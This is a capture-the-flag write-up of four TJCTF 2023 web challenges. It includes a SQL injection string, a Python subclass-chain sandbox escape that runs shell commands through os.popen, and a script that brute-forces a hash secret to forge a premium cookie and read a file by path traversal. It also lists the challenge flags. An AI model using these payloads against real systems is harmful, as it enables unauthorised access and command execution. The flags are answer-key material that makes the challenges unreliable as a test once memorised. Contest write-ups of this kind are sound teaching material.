Web challenges in TJCTF 2023
hi
Nothing interesting in the website. But there is something interesting in the source.
Flag: tjctf{pretty_canvas_577f7045}
swill-squill
This is vulnerable to basic ' or 1=1 ; -- SQL injection.
Flag: tjctf{swill_sql_1y1029345029374}
outdated
Some blacklisted items here but its essentially a SSTI sort of. I tried a basic payload.
print(''.__class__.__mro__[1].__subclasses__())
4th last item is my favourite.
print(''.__class__.__mro__[1].__subclasses__()[-4].__init__.__globals__['sys'].modules['os'].popen('ls').read())
print(''.__class__.__mro__[1].__subclasses__()[-4].__init__.__globals__['sys'].modules['os'].popen('cat flag-cce1c56d-466d-4af9-8ae7-c7bcf99d5c49.txt').read())
Flag: tjctf{oops_bad_filter_3b582f74}
pay-to-win
Need to bypass this so need to bruteforce the 6 character key.
Getting premium allows us to load anything. Like the flag
import requests
import hashlib
import itertools
characters = 'abcdefghijklmnopqrstuvwxyz0123456789'
length = 6
combinations = itertools.product(characters, repeat=length)
url = 'https://pay-to-win.tjc.tf/'
new = "eyJ1c2VybmFtZSI6ICJqZXJvbWUiLCAidXNlcl90eXBlIjogInByZW1pdW0ifQ==" #'{"username": "jerome", "user_type": "premium"}'
old = "eyJ1c2VybmFtZSI6ICJqZXJvbWUiLCAidXNlcl90eXBlIjogImJhc2ljIn0=" #'{"username": "jerome", "user_type": "basic"}'
h = "46378b50e362bb73a60886b2d55957b6a79acd1ae8d6069a7bce2fbbda3f640c"
def hash(data):
return hashlib.sha256(bytes(data, 'utf-8')).hexdigest()
actual_secret = ""
actual_hash = ""
for c in combinations:
secret = ''.join(c)
hashed = hash(old + secret)
if hashed == h:
actual_secret = secret
actual_hash = hash(new + secret)
break
print(actual_secret)
print(actual_hash)
r = requests.get(url + "?theme=/secret-flag-dir/flag.txt", cookies={'data': new, 'hash': actual_hash})
print(r.text)
Flag: tjctf{not_random_enough_64831eff}